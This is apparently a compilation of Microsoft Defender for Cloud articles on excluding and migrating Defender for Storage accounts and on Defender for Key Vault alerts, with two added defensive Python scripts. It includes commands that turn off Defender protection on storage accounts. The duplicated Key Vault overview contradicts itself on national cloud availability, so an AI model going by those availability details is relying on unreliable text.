Learn more about the az security atp storage command.


Exclude a storage account from a protected 
subscription in the per-transaction plan 


When you enable Microsoft Defender for Storage on a subscription for the per- 
transaction pricing, all current and future Azure Storage accounts in that subscription 
are protected. You can exclude specific storage accounts from the Defender for Storage 
protections using the Azure portal, PowerShell, or the Azure CLI. 


We recommend that you enable Defender for Storage on the entire subscription to 
protect all existing and future storage accounts in it. However, there are some cases 
where people want to exclude specific storage accounts from Defender protection. 


Exclusion of storage accounts from protected subscriptions requires you to: 


1. Add a tag to block inheriting the subscription enablement. 
2. Disable Defender for Storage (classic). 


Note


Consider upgrading to the new Defender for Storage plan if you have storage 
accounts you would like to exclude from the Defender for Storage classic plan. Not 
only will you save on costs for transaction-heavy accounts, but you'll also gain 
access to enhanced security features. Learn more about the benefits of migrating 
to the new plan. 


Excluded storage accounts in the Defender for Storage classic are not automatically 
excluded when you migrate to the new plan. 


Exclude an Azure Storage account protection on a 
subscription with per-transaction pricing 


To exclude an Azure Storage account from Microsoft Defender for Storage (classic), you 
can use: 


• PowerShell
• Azure CLI


Use PowerShell to exclude an Azure Storage account 


1. If you don't have the Azure Az PowerShell module installed, install it using the
   instructions from the Azure PowerShell documentation.

2. Using an authenticated account, connect to Azure with the Connect-AzAccount
   cmdlet, as explained in Sign in with Azure PowerShell.

3. Define the AzDefenderPlanAutoEnable tag on the storage account with the
   Update-AzTag cmdlet (replace <resourceId> with the resource ID of the relevant
   storage account):

   Azure PowerShell

   Update-AzTag -ResourceId <resourceId> -Tag @{"AzDefenderPlanAutoEnable" = "off"} -Operation Merge

   If you skip this stage, your untagged resources continue receiving daily updates
   from the subscription level enablement policy. That policy enables Defender for
   Storage again on the account. Learn more about tags in Use tags to organize your
   Azure resources and management hierarchy.

4. Disable Microsoft Defender for Storage for the desired account on the relevant
   subscription with the Disable-AzSecurityAdvancedThreatProtection cmdlet (using
   the same resource ID):

   Azure PowerShell

   Disable-AzSecurityAdvancedThreatProtection -ResourceId <resourceId>

Learn more about this cmdlet.


Use Azure CLI to exclude an Azure Storage account 


1. If you don't have Azure CLI installed, install it using the instructions from the Azure
   CLI documentation.

2. Using an authenticated account, connect to Azure with the login command as
   explained in Sign in with Azure CLI and enter your account credentials when
   prompted:

   Azure CLI

   az login

3. Define the AzDefenderPlanAutoEnable tag on the storage account with the tag
   update command (replace MyResourceId with the resource ID of the relevant
   storage account):

   Azure CLI

   az tag update --resource-id MyResourceId --operation merge --tags AzDefenderPlanAutoEnable=off

   If you skip this stage, your untagged resources continue receiving daily updates
   from the subscription level enablement policy. That policy enables Defender for
   Storage again on the account.

   Tip

   Learn more about tags in az tag.

4. Disable Microsoft Defender for Storage for the desired account on the relevant
   subscription with the security atp storage command (using the same resource
   ID):

   Azure CLI

   az security atp storage update --resource-group MyResourceGroup --storage-account MyStorageAccount --is-enabled false

Learn more about this command.
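Because the exclusion described above only holds when both steps are done (the tag stops the daily subscription policy from re-enabling the account, the disable call turns protection off), an inventory check that spots half-done exclusions is useful. The following is an added example, not Microsoft's code: it audits a list of storage accounts, flags accounts that are tagged but still enabled or disabled but untagged, and derives the Azure CLI commands from this page that complete the exclusion from the account's resource ID. The account records are constructed here; in practice the tags come from `az resource show` and the enablement state from `az security atp storage show`. Two assumptions of the checker: the tag name is matched case-insensitively, and the value `off` in any casing counts as the exclusion marker (this page's CLI example writes `off`, its portal screenshot shows `Off`).

```python
"""Audit AzDefenderPlanAutoEnable exclusions for Defender for Storage (classic).

Added example (not Microsoft's code). Models the two-step exclusion on this page:
1. tag the account AzDefenderPlanAutoEnable=off, 2. disable the account-level setting.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

TAG_NAME = "AzDefenderPlanAutoEnable"
STORAGE_ID_RE = re.compile(
    r"^/subscriptions/(?P<sub>[^/]+)/resourceGroups/(?P<rg>[^/]+)"
    r"/providers/Microsoft\.Storage/storageAccounts/(?P<name>[^/]+)/?$", re.IGNORECASE)


@dataclass
class StorageAccount:
    resource_id: str
    tags: Dict[str, str] = field(default_factory=dict)
    atp_enabled: bool = False  # account-level Defender for Storage (classic) setting


def parse_storage_id(resource_id: str):
    """Split a storage account resource ID into (subscription, resource group, name)."""
    m = STORAGE_ID_RE.match(resource_id)
    if not m:
        raise ValueError(f"not a storage account resource ID: {resource_id}")
    return m.group("sub"), m.group("rg"), m.group("name")


def has_exclusion_tag(tags: Dict[str, str]) -> bool:
    # Tag names are case-insensitive in Azure; accepting any casing of the value
    # is an assumption of this checker.
    for name, value in tags.items():
        if name.lower() == TAG_NAME.lower():
            return value.strip().lower() == "off"
    return False


def audit(accounts: List[StorageAccount], subscription_plan_enabled: bool) -> Dict[str, str]:
    """Return {resource_id: finding}.

    protected      untagged and enabled: the expected state under a protected subscription
    excluded       tagged and disabled: both exclusion steps done
    tag-only       tagged but still enabled: step 2 (disable) is missing
    disable-only   disabled but untagged: the daily enablement policy will turn it back on
    not-inherited  subscription plan is off, so only the account's own setting applies
    """
    findings = {}
    for acct in accounts:
        tagged = has_exclusion_tag(acct.tags)
        if not subscription_plan_enabled:
            state = "enabled" if acct.atp_enabled else "disabled"
            findings[acct.resource_id] = f"not-inherited ({state})"
        elif tagged and not acct.atp_enabled:
            findings[acct.resource_id] = "excluded"
        elif tagged:
            findings[acct.resource_id] = "tag-only"
        elif not acct.atp_enabled:
            findings[acct.resource_id] = "disable-only"
        else:
            findings[acct.resource_id] = "protected"
    return findings


def remediation(acct: StorageAccount, finding: str) -> List[str]:
    """Azure CLI commands (the ones on this page) that complete a half-done exclusion."""
    _, rg, name = parse_storage_id(acct.resource_id)
    tag_cmd = (f"az tag update --resource-id {acct.resource_id} --operation merge "
               f"--tags {TAG_NAME}=off")
    disable_cmd = (f"az security atp storage update --resource-group {rg} "
                   f"--storage-account {name} --is-enabled false")
    if finding == "tag-only":
        return [disable_cmd]
    if finding == "disable-only":
        return [tag_cmd, disable_cmd]  # re-disable in case the policy already re-enabled it
    return []


def needs_attention(findings: Dict[str, str]) -> List[str]:
    return sorted(rid for rid, f in findings.items() if f in ("tag-only", "disable-only"))


# Constructed sample inventory with a placeholder subscription ID.
_SUB = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-data"
_PROVIDER = "/providers/Microsoft.Storage/storageAccounts/"
SAMPLE_ACCOUNTS = [
    StorageAccount(_SUB + _PROVIDER + "stprodlogs", {}, True),
    StorageAccount(_SUB + _PROVIDER + "stscratch", {"azdefenderplanautoenable": "Off"}, False),
    StorageAccount(_SUB + _PROVIDER + "stbulkingest", {TAG_NAME: "off"}, True),
    StorageAccount(_SUB + _PROVIDER + "stlegacy", {"env": "test"}, False),
]

if __name__ == "__main__":
    results = audit(SAMPLE_ACCOUNTS, subscription_plan_enabled=True)
    for acct in SAMPLE_ACCOUNTS:
        print(f"{acct.resource_id.rsplit('/', 1)[-1]}: {results[acct.resource_id]}")
        for cmd in remediation(acct, results[acct.resource_id]):
            print("   ", cmd)
```

The "disable-only" finding is the one most often missed in practice: the account looks disabled today, but without the tag the subscription policy re-enables it within a day, so the audit should be re-run after remediation.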


Exclude an Azure Databricks Storage account 


Exclude an active Databricks workspace 


Microsoft Defender for Storage can exclude specific active Databricks workspace storage 
accounts, when the plan is already enabled on a subscription. 


To exclude an active Databricks workspace:

1. Sign in to the Azure portal.
2. Navigate to Azure Databricks > Your Databricks workspace > Tags.
3. In the Name field, enter AzDefenderPlanAutoEnable.
4. In the Value field, enter off and then select Apply.


(Screenshot: the Tags page of the Databricks workspace in the Azure portal, with AzDefenderPlanAutoEnable entered in the Name field and its value ready to be applied.)


5. Navigate to Microsoft Defender for Cloud > Environment settings > Your
   subscription.

6. Turn the Defender for Storage plan to Off and select Save.


(Screenshot: Environment settings > Defender plans for the subscription, showing the Storage plan toggle alongside the other Defender plans.)


7. Re-enable Defender for Storage (classic) using one of the supported methods (you
   can't enable Defender for Storage classic from the Azure portal).

The tags are inherited by the Storage account of the Databricks workspace and prevent
Defender for Storage from turning on.

Note

Tags can't be added directly to the Databricks Storage account, or its Managed
Resource Group.


Prevent autoenabling on a new Databricks workspace storage 
account 


When you create a new Databricks workspace, you have the ability to add a tag that 
prevents your Microsoft Defender for Storage account from enabling automatically. 


To prevent auto-enabling on a new Databricks workspace storage account:

1. Follow these steps to create a new Azure Databricks workspace.
2. In the Tags tab, enter a tag named AzDefenderPlanAutoEnable.
3. Enter the value off.

(Screenshot: the Tags tab of the Create an Azure Databricks workspace wizard, with the AzDefenderPlanAutoEnable tag set to Off on the Azure Databricks Service resource.)

4. Continue following the instructions to create your new Azure Databricks
   workspace.


The Microsoft Defender for Storage account inherits the tag of the Databricks 
workspace, which prevents Defender for Storage from turning on automatically. 


Next steps 


• Check out the alerts for Azure Storage
• Learn about the features and benefits of Defender for Storage
• Check out common questions about Defender for Storage classic.


Migrate from Defender for Storage 
(classic) to the new plan 


Article e 08/29/2023 


The new Defender for Storage plan was launched on March 28, 2023. If you're currently 
using Microsoft Defender for Storage (classic) with the per-transaction or the per- 
storage account pricing plan, consider upgrading to the new Defender for Storage plan, 
which offers several new benefits that aren't included in the classic plan. 


Why move to the new plan? 


The new plan includes advanced security capabilities to help protect against malicious 
file uploads, sensitive data exfiltration, and data corruption. 


The new plan also provides a more predictable and flexible pricing structure for better
control over coverage and costs.


The new pricing plan charges based on the number of storage accounts you protect, 
which simplifies cost calculations and allows for easy scaling as your needs change. You 
can enable it at the subscription or resource level and can also exclude specific storage 
accounts from protected subscriptions, providing more granular control over your 
security coverage. Extra charges may apply to storage accounts with high-volume 
transactions that exceed a high monthly threshold. 


Deprecation of Defender for Storage (classic) 
The classic plan will be deprecated in the future, and the deprecation will be announced 
three years in advance. All future capabilities will only be added to the new plan. 

Note

If you already have the legacy Defender for Storage (classic) enabled and want to
access the new security features and pricing, you'll need to proactively migrate to
the new plan. You can migrate to the new plan with one-click through the Azure
Portal or use Azure Policy and IaC tools.


Migration scenarios 


Migrating from the classic Defender for Storage plan to the new Defender for Storage 
plan is a straightforward process, and there are several ways to do it. You'll need to 
proactively enable the new plan to access its enhanced capabilities and pricing. 


Note


To enable the new plan, make sure to disable the old Defender for Storage policies. 
Look for and disable policies named "Configure Azure Defender for Storage to be 
enabled", "Azure Defender for Storage should be enabled", or “Configure Microsoft 
Defender for Storage to be enabled (per-storage account plan)". 


Migrating from the classic Defender for Storage plan 
enabled with per-transaction pricing 


If the classic Defender for Storage plan is enabled with per-transaction pricing, you can 
switch to the new plan at either the subscription or resource level. You can also exclude 
specific storage accounts from protected subscriptions. 


Storage accounts that were previously excluded from protected subscriptions in the per- 
transaction plan will not remain excluded when you switch to the new plan. However, 
the exclusion tags will remain on the resource and can be removed. In most cases, 
storage accounts that were previously excluded from protected subscriptions will 
benefit the most from the new pricing plan. 


Migrating from the classic Defender for Storage plan 
enabled with per-storage account pricing 


If the classic Defender for Storage plan is enabled with per-storage account pricing, you 
can switch to the new plan at either the subscription or resource level. The new 
Defender for Storage plan has the same pricing plan with the exception of malware 
scanning which may incur extra charges and is billed per GB scanned. 


You can learn more about Defender for Storage's pricing model on the Defender for
Cloud pricing page.


You can also exclude specific storage accounts from protected subscriptions. 


Identify active Microsoft Defender for Storage 
pricing plans on your subscriptions 


If you're looking to quickly identify which pricing plans are active on your subscriptions,
utilizing this Coverage workbook based on Azure Resource Graph (ARG) Explorer
(with the 'securityresources' table) data is a great solution. This tool allows you to
simplify and analyze your enablement status easily.


Note


The Coverage workbook and ARG Explorer query only provide enablement status 
when Defender for Storage is enabled at the subscription level. For storage 
accounts with Defender for Storage enabled at the resource level, the enablement 
status can be found within the Defender for Cloud blade of the storage accounts in 
the Azure portal. Additionally, the enablement status can be queried with a 
PowerShell script. 


Plan comparison 


To help you better understand the differences between the classic plan and the new 
plan, here's a comparison table: 


Category | New Defender for Storage plan | Classic (per-transaction plan) | Classic (per-storage account plan)
Pricing structure | Cost is based on the number of storage accounts you protect*. Add-on costs for GB scanned for malware, if enabled | Cost is based on the number of transactions processed | Cost is based on the number of storage accounts you protect*
Enablement options | Subscription and resource level | Subscription and resource level | Subscription only
Exclusion of storage accounts from protected subscriptions | Yes | Yes | No
Activity monitoring (security alerts) | Yes | Yes | Yes
Malware scanning in uploaded Blobs | Yes (add-on) | No (only hash-reputation analysis) | No (only hash-reputation analysis)
Sensitive data threat detection | Yes (add-on) | No | No
Detection of leaked/compromised SAS tokens (entities without identities) | Yes | No | No

* extra charges may apply to storage accounts with high-volume transactions.


The new plan offers a more comprehensive feature set designed to better protect your 
data. It also provides a more predictable pricing plan compared to the classic plan. We 
recommend you migrate to the new plan to take full advantage of its benefits. 


Learn more about how to enable and configure Defender for Storage. 


Next steps 


In this article, you learned about migrating to the new Microsoft Defender for Storage 
plan. 


Enable Defender for Storage 


Common questions about 
Defender for Storage classic 


FAQ 


Get answers to common questions about Microsoft Defender for Storage classic. 


Are there differences in features 
between the new Defender for Storage 
plan and the legacy Defender for 
Storage Classic plan? 


Yes. The new Defender for Storage plan offers additional security capabilities, such as 
near real-time malware scanning and sensitive data threat detection. This plan also 
provides a more predictable pricing structure for better control over coverage and costs. 
Learn more about the benefits of migrating to the new plan. 

How do I estimate charges at the
account level?

To get an estimate of Defender for Storage classic costs, use the Price Estimation
Workbook in the Azure portal.

Can I exclude a specific Azure Storage
account from a protected subscription?


Yes, you can exclude specific storage accounts from protected subscriptions in Defender 
for Storage (classic). 


Can I switch from the per-transaction
pricing in Defender for Storage (classic)
to the new Defender for Storage plan?


Yes, you can move to the new Defender for Storage plan with per-storage account
pricing through the Azure portal or other supported methods. This change isn't
automatic; you'll need to actively make the switch. Learn about how to migrate to the
new Defender for Storage.


Can I exclude specific storage accounts
from protection in the new Defender for
Storage plan?


Yes, the new Defender for Storage plan with per-storage account pricing allows you to 
exclude and configure specific storage accounts within protected subscriptions. 
However, you'll need to set up the exclusion again after you migrate to the new plan. 
Learn about how to migrate to the new Defender for Storage. 


Can I switch from an existing per-transaction
pricing under the Defender
for Storage (classic) plan to the new
per-storage account pricing under the
new Defender for Storage plan?


Yes, you can migrate to the per-storage account pricing under the new Defender for 
Storage plan in the Azure portal or using any of the supported enablement methods. 


Can I return to per-transaction pricing in
the Defender for Storage (classic) plan
after switching to per-storage account
pricing?


Yes, you can enable per-transaction pricing under the Defender for Storage (classic) plan 
to migrate back from per-storage account pricing using all enablement methods except 
for the Azure portal. 


Will you continue supporting per- 
transaction pricing in the Defender for 
Storage (classic) plan? 

Yes, you can enable per-transaction pricing under the Defender for Storage (classic) plan 
from all the supported enablement methods, except for the Azure portal. 

Under the Defender for Storage (classic)
per-storage account pricing, can I
exclude specific storage accounts from
protections?


No, you can only enable per-storage account pricing under the Defender for Storage 
(classic) plan at the subscription level. All storage accounts in the subscriptions are 
protected. 

How long does it take for per-storage 
account pricing to be enabled in the 
Defender for Storage (classic) plan? 


When you enable Microsoft Defender for Storage at the subscription level for per- 
storage account or per-transaction pricing under the Defender for Storage (classic) plan, 
it takes up to 24 hours for the plan to be enabled. 


Is there any difference in the feature set 
of per-storage account pricing 
compared to the legacy per-transaction 
pricing in the Defender for Storage 
(classic) plan? 


No. Both per-storage account and per-transaction pricing under the Defender for 
Storage (classic) plan include the same features. The only difference is the pricing 
structure. 


How can I estimate the cost for each
pricing under the Defender for Storage
(classic) plan?


To estimate the cost according to each pricing for your environment under the Defender
for Storage (classic) plan, we created a pricing estimation workbook and a PowerShell
script that you can run in your environment.


Next steps 


Learn more about Defender for Storage classic 


Overview of Microsoft Defender for Key 
Vault 


Article e 05/10/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection 
for Azure Key Vault, providing an additional layer of security intelligence. 


Availability 


Aspect          Details
Release state:  General availability (GA)
Pricing:        Microsoft Defender for Key Vault is billed as shown on the pricing page
Clouds:         ✔ Commercial clouds
                ✔ National (Azure Government, Azure China 21Vianet)


What are the benefits of Microsoft Defender 
for Key Vault? 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 


When anomalous activities occur, Defender for Key Vault shows alerts and optionally 
sends them via email to relevant members of your organization. These alerts include the 
details of the suspicious activity and recommendations on how to investigate and 
remediate threats. 


Microsoft Defender for Key Vault alerts 


When you get an alert from Microsoft Defender for Key Vault, we recommend you
investigate and respond to the alert as described in Respond to Microsoft Defender for
Key Vault. Microsoft Defender for Key Vault protects applications and credentials, so
even if you're familiar with the application or user that triggered the alert, it's important
to check the situation surrounding every alert.


The alerts appear in Key Vault's Security page, the Workload protections, and Defender 
for Cloud's security alerts page. 


(Screenshot: the Security page of a key vault. It shows Microsoft Defender for Key Vault set to On, a Recommendations list with entries such as "Diagnostic logs in Key Vault should be enabled" (Low), "Firewall should be enabled on Key Vault" (Medium), "Key vaults should have purge protection enabled" (Medium) and "Private endpoint should be configured for Key Vault" (Medium), and a Security incidents and alerts section covering the past 21 days with a link to check for Microsoft Defender alerts on the resource in Microsoft Defender for Cloud.)


Tip

You can simulate Microsoft Defender for Key Vault alerts by following the
instructions in Validating Azure Key Vault threat detection in Microsoft Defender
for Cloud.


Respond to Microsoft Defender for Key Vault 
alerts 


When you receive an alert from Microsoft Defender for Key Vault, we recommend you
investigate and respond to the alert as described below. Microsoft Defender for Key
Vault protects applications and credentials, so even if you're familiar with the application
or user that triggered the alert, it's important to verify the situation surrounding every
alert.

Alerts from Microsoft Defender for Key Vault include these elements:

• Object ID
• User Principal Name or IP address of the suspicious resource


Depending on the type of access that occurred, some fields might not be available. For 
example, if your key vault was accessed by an application, you won't see an associated 
User Principal Name. If the traffic originated from outside of Azure, you won't see an 
Object ID. 


Tip


Azure virtual machines are assigned Microsoft IPs. This means that an alert might 
contain a Microsoft IP even though it relates to activity performed from outside of 
Microsoft. So even if an alert has a Microsoft IP, you should still investigate as 
described on this page. 


Step 1. Identify the source 


1. Verify whether the traffic originated from within your Azure tenant. If the key vault 
firewall is enabled, it's likely that you've provided access to the user or application 
that triggered this alert. 

2. If you can't verify the source of the traffic, continue to Step 2. Respond accordingly. 

3. If you can identify the source of the traffic in your tenant, contact the user or 
owner of the application. 


Caution


Microsoft Defender for Key Vault is designed to help identify suspicious activity 
caused by stolen credentials. Don't dismiss the alert simply because you recognize 
the user or application. Contact the owner of the application or the user and verify 
the activity was legitimate. You can create a suppression rule to eliminate noise if 
necessary. Learn more in Suppress security alerts. 


Step 2. Respond accordingly 


If you don't recognize the user or application, or if you think the access shouldn't have 
been authorized: 


• If the traffic came from an unrecognized IP Address:

  1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault
     firewalls and virtual networks.
  2. Configure the firewall with trusted resources and virtual networks.

• If the source of the alert was an unauthorized application or suspicious user:

  1. Open the key vault's access policy settings.
  2. Remove the corresponding security principal, or restrict the operations the
     security principal can perform.

• If the source of the alert has an Azure Active Directory role in your tenant:

  1. Contact your administrator.
  2. Determine whether there's a need to reduce or revoke Azure Active Directory
     permissions.


Step 3. Measure the impact 


When the event has been mitigated, investigate the secrets in your key vault that were 
affected: 


1. Open the Security page on your Azure key vault and view the triggered alert. 

2. Select the specific alert that was triggered and review the list of the secrets that 
were accessed and the timestamp. 

3. Optionally, if you have key vault diagnostic logs enabled, review the previous 
operations for the corresponding caller IP, user principal, or object ID. 


Step 4. Take action 


When you've compiled your list of the secrets, keys, and certificates that were accessed 
by the suspicious user or application, you should rotate those objects immediately. 


1. Affected secrets should be disabled or deleted from your key vault. 
2. If the credentials were used for a specific application: 
   a. Contact the administrator of the application and ask them to audit their
      environment for any uses of the compromised credentials since they were
      compromised.


b. If the compromised credentials were used, the application owner should identify 
the information that was accessed and mitigate the impact. 
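Step 3 and Step 4 above come down to one question: which objects did the flagged caller actually touch? The following is an added example, not Microsoft's code, that answers it from Key Vault diagnostic logs. Starting from the caller IP, object ID or user principal name carried by the alert, it walks AuditEvent records and returns the secrets, keys and certificates the caller successfully read or used (with operation names, versions and first/last access time), plus the objects it was denied, which is the list to rotate. Matching is "any selector hits", so a stolen credential reused from a second IP, or a second identity on the same IP, is not missed. The log records are constructed for this example and use the AuditEvent field names as the author understands them (time, operationName, resultType, callerIpAddress, identity.claim.oid/upn, properties.id); verify them against your own diagnostic settings export before relying on the script.

```python
"""Triage Key Vault diagnostic (AuditEvent) logs after a Defender for Key Vault alert.

Added example (not Microsoft's code). Input is NDJSON, one AuditEvent record per line,
as exported by Key Vault diagnostic settings to a storage account.
"""
import json
import re

# Key Vault object URIs look like https://<vault>.vault.azure.net/<kind>/<name>[/<version>]
OBJECT_RE = re.compile(
    r"^https://[^/]+/(?P<kind>secrets|keys|certificates)/(?P<name>[^/]+)(?:/(?P<version>[^/]+))?/?$")

# Constructed sample records; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
_RECORDS = [
    {"time": "2023-08-01T10:00:00Z", "operationName": "VaultGet", "resultType": "Success",
     "callerIpAddress": "203.0.113.7", "identity": {"claim": {"oid": "aaaa-oid-1"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/"}},
    {"time": "2023-08-01T10:00:05Z", "operationName": "SecretGet", "resultType": "Success",
     "callerIpAddress": "203.0.113.7", "identity": {"claim": {"oid": "aaaa-oid-1"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/secrets/db-conn/4b1c2d3e"}},
    {"time": "2023-08-01T10:00:09Z", "operationName": "SecretGet", "resultType": "Success",
     "callerIpAddress": "203.0.113.7", "identity": {"claim": {"oid": "aaaa-oid-1"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/secrets/db-conn/4b1c2d3e"}},
    {"time": "2023-08-01T10:00:20Z", "operationName": "KeySign", "resultType": "Success",
     "callerIpAddress": "198.51.100.9", "identity": {"claim": {"oid": "aaaa-oid-1"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/keys/signing-key/9f8e7d6c"}},
    {"time": "2023-08-01T10:01:00Z", "operationName": "SecretGet", "resultType": "Forbidden",
     "callerIpAddress": "203.0.113.7", "identity": {"claim": {"oid": "aaaa-oid-1"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/secrets/admin-password"}},
    {"time": "2023-08-01T10:02:00Z", "operationName": "SecretGet", "resultType": "Success",
     "callerIpAddress": "198.51.100.5",
     "identity": {"claim": {"oid": "bbbb-oid-2", "upn": "svc-backup@contoso.example"}},
     "properties": {"id": "https://contoso-kv.vault.azure.net/secrets/backup-key/01"}},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in _RECORDS)


def _matches(rec, caller_ip, object_id, upn):
    """True if any of the alert's selectors matches this record."""
    claim = (rec.get("identity") or {}).get("claim") or {}
    return bool((caller_ip and rec.get("callerIpAddress") == caller_ip)
                or (object_id and claim.get("oid") == object_id)
                or (upn and claim.get("upn", "").lower() == upn.lower()))


def triage(ndjson: str, caller_ip=None, object_id=None, upn=None) -> dict:
    """Return {"accessed": [...], "denied": [...]}, one summary entry per vault object."""
    acc = {"accessed": {}, "denied": {}}
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if not _matches(rec, caller_ip, object_id, upn):
            continue
        m = OBJECT_RE.match((rec.get("properties") or {}).get("id", ""))
        if not m:
            continue  # vault-level operations such as VaultGet touch no object
        bucket = acc["accessed"] if rec.get("resultType") == "Success" else acc["denied"]
        key = (m.group("kind"), m.group("name"))
        entry = bucket.setdefault(key, {"kind": key[0], "name": key[1], "versions": set(),
                                        "operations": set(), "count": 0,
                                        "first": rec["time"], "last": rec["time"]})
        entry["count"] += 1
        entry["operations"].add(rec["operationName"])
        if m.group("version"):
            entry["versions"].add(m.group("version"))
        # Timestamps share one ISO-8601 UTC format, so string order is time order.
        entry["first"] = min(entry["first"], rec["time"])
        entry["last"] = max(entry["last"], rec["time"])

    def finish(bucket):
        return [dict(e, versions=sorted(e["versions"]), operations=sorted(e["operations"]))
                for _, e in sorted(bucket.items())]
    return {"accessed": finish(acc["accessed"]), "denied": finish(acc["denied"])}


if __name__ == "__main__":
    # Selectors as they would be copied from the alert.
    result = triage(SAMPLE_LOG, caller_ip="203.0.113.7", object_id="aaaa-oid-1")
    for label in ("accessed", "denied"):
        for e in result[label]:
            print(f"{label}: {e['kind']}/{e['name']} ops={e['operations']} "
                  f"versions={e['versions']} n={e['count']} {e['first']}..{e['last']}")
```

Every entry in "accessed" is a rotation candidate; the "denied" list is worth keeping too, since a caller that was refused `admin-password` tells the application owner what the intruder was after even though no value was exposed.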


Next steps 
In this article, you learned about Microsoft Defender for Key Vault. 
For related material, see the following articles: 


• Key Vault security alerts: the Key Vault section of the reference table for all
  Microsoft Defender for Cloud alerts

• Continuously export Defender for Cloud data

• Suppress security alerts


Protect your key vaults with Defender 
for Key Vault 


Article e 07/05/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection for 
Azure Key Vault, providing an additional layer of security intelligence. 


Learn more about Microsoft Defender for Key Vault. 


You can learn more about Defender for Key Vault's pricing on the pricing page.


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription,
  you can sign up for a free subscription.

• You must enable Microsoft Defender for Cloud on your Azure subscription.


Enable the Key Vault plan 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 

To enable the Defender for Key Vault plan on your subscription: 

1. Sign in to the Azure portal. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 
5. On the Defender plans page, toggle the Key Vault plan to On. 


[Screenshot: Environment settings > Defender plans page. The page notes that when you 
select Save, Microsoft Defender for Cloud's enhanced security features will be enabled 
on all the resource types you've selected, that the first 30 days are free, and that 
more information is on the Defender for Cloud pricing page.] 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Key Vault 




Overview of Microsoft Defender for Key Vault 


Article • 05/10/2023 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like 
certificates, connection strings, and passwords. 


Enable Microsoft Defender for Key Vault for Azure-native, advanced threat protection 
for Azure Key Vault, providing an additional layer of security intelligence. 


Availability 


Aspect          Details 
Release state:  General availability (GA) 
Pricing:        Microsoft Defender for Key Vault is billed as shown on the pricing page 
Clouds:         ✔ Commercial clouds 
                ✘ National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender for Key Vault? 


Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to 
access or exploit Key Vault accounts. This layer of protection helps you address threats 
even if you're not a security expert, and without the need to manage third-party security 
monitoring systems. 


When anomalous activities occur, Defender for Key Vault shows alerts and optionally 
sends them via email to relevant members of your organization. These alerts include the 
details of the suspicious activity and recommendations on how to investigate and 
remediate threats. 


Microsoft Defender for Key Vault alerts 


When you get an alert from Microsoft Defender for Key Vault, we recommend you 
investigate and respond to the alert as described in Respond to Microsoft Defender for 
Key Vault. Microsoft Defender for Key Vault protects applications and credentials, so 
even if you're familiar with the application or user that triggered the alert, it's important 
to check the situation surrounding every alert. 


The alerts appear in Key Vault's Security page, the Workload protections, and Defender 
for Cloud's security alerts page. 


[Screenshot: a key vault's Security page. The Recommendations section lists, for 
example, "Diagnostic logs in Key Vault should be enabled" (Low), "Firewall should be 
enabled on Key Vault" (Medium), "Key vaults should have purge protection enabled" 
(Medium), and "Private endpoint should be configured for Key Vault" (Medium), with a 
link to view additional recommendations in Defender for Cloud. The Security incidents 
and alerts section shows alerts from the past 21 days and a link to check for Microsoft 
Defender alerts on this resource in Microsoft Defender for Cloud.] 


Tip 

You can simulate Microsoft Defender for Key Vault alerts by following the 
instructions in Validating Azure Key Vault threat detection in Microsoft Defender 
for Cloud. 


Respond to Microsoft Defender for Key Vault alerts 


When you receive an alert from Microsoft Defender for Key Vault, we recommend you 
investigate and respond to the alert as described below. Microsoft Defender for Key 
Vault protects applications and credentials, so even if you're familiar with the application 
or user that triggered the alert, it's important to verify the situation surrounding every 
alert. 


Alerts from Microsoft Defender for Key Vault include these elements: 

• Object ID 
• User Principal Name or IP address of the suspicious resource 


Depending on the type of access that occurred, some fields might not be available. For 
example, if your key vault was accessed by an application, you won't see an associated 
User Principal Name. If the traffic originated from outside of Azure, you won't see an 
Object ID. 


Tip 


Azure virtual machines are assigned Microsoft IPs. This means that an alert might 
contain a Microsoft IP even though it relates to activity performed from outside of 
Microsoft. So even if an alert has a Microsoft IP, you should still investigate as 
described on this page. 


Step 1. Identify the source 


1. Verify whether the traffic originated from within your Azure tenant. If the key vault 
firewall is enabled, it's likely that you've provided access to the user or application 
that triggered this alert. 

2. If you can't verify the source of the traffic, continue to Step 2. Respond accordingly. 

3. If you can identify the source of the traffic in your tenant, contact the user or 
owner of the application. 


Caution 


Microsoft Defender for Key Vault is designed to help identify suspicious activity 
caused by stolen credentials. Don't dismiss the alert simply because you recognize 
the user or application. Contact the owner of the application or the user and verify 
the activity was legitimate. You can create a suppression rule to eliminate noise if 
necessary. Learn more in Suppress security alerts. 


Step 2. Respond accordingly 


If you don't recognize the user or application, or if you think the access shouldn't have 
been authorized: 


• If the traffic came from an unrecognized IP Address: 
  1. Enable the Azure Key Vault firewall as described in Configure Azure Key Vault 
     firewalls and virtual networks. 
  2. Configure the firewall with trusted resources and virtual networks. 

• If the source of the alert was an unauthorized application or suspicious user: 
  1. Open the key vault's access policy settings. 
  2. Remove the corresponding security principal, or restrict the operations the 
     security principal can perform. 

• If the source of the alert has an Azure Active Directory role in your tenant: 
  1. Contact your administrator. 
  2. Determine whether there's a need to reduce or revoke Azure Active Directory 
